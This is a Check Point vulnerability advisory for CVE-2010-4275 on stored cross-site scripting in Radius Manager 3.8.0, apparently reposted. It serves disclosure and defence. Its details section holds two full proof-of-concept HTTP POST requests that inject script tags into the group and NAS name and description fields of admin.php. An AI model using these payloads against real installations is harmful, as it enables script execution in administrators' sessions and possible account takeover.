The Enigma Group

Radius Manager 3.8.0 - Multiple XSS Vulnerabilities


Check Point Software Technologies - Vulnerability Discovery Team (VDT)

http://www.checkpoint.com/defense/



Radius Manager Multiple Cross Site Scripting Issues

CVE-2010-4275





INTRODUCTION



Radius Manager is a centralized way for administration of Mikrotik, Cisco, Chillispot and StarOS routers and wireless 

access points.  It has

a centralized accounting system that uses Radius, provinding easy user and accounting management for ISP's.



This problem was confirmed in the following versions of the Radius Manager, other versions maybe also affected.



Radius Manager 3.8.0





CVSS Scoring System



The CVSS score is: 6.4

        Base Score: 6.7

        Temporal Score: 6.4

We used the following values to calculate the scores:

        Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N

        Temporal score is: E:F/RL:U/RC:C





DETAILS



The Radius Manager system is affected by Multiple Stored Cross Site Scripting.  The “Group Name” and “Description” in 

“new_usergroup” menu do not 

sanitize input data, allowing attacker to store malicious javascript code in a page.



The same thing occurs with “new_nas” menu



Request:

http://<server>/admin.php?cont=update_usergroup&id=1

POST /admin.php?cont=update_usergroup&id=1 HTTP/1.1

Host: <server>

User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914

Firefox/3.6.10

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Connection: keep-alive

Referer: http://<server>/admin.php?cont=edit_usergroup&id=1

Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; 

listusers_ordercol=username; 

listusers_ordertype=DESC; listusers_lastorder=username

Content-Type: application/x-www-form-urlencoded

Content-Length: 120

name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Update



Request 2:

http://<serveR>/admin.php?cont=store_nas

POST /admin.php?cont=store_nas HTTP/1.1

Host: <server>

User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914

Firefox/3.6.10

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Connection: keep-alive

Referer: http://<server>/admin.php?cont=new_nas

Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; 

listusers_ordercol=username; 

listusers_ordertype=DESC; listusers_lastorder=username

Content-Type: application/x-www-form-urlencoded

Content-Length: 112

name=Name&nasip=10.0.0.1&type=0&secret=1111&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Add+NAS







CREDITS



This vulnerability has been brought to our attention by Ulisses Castro from Conviso IT Security company 

(http://www.conviso.com.br) and researched 

internally by Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT).







Rodrigo Rubira Branco

Senior Security Researcher

Vulnerability Discovery Team (VDT)

Check Point Software Technologies

http://www.checkpoint.com/defense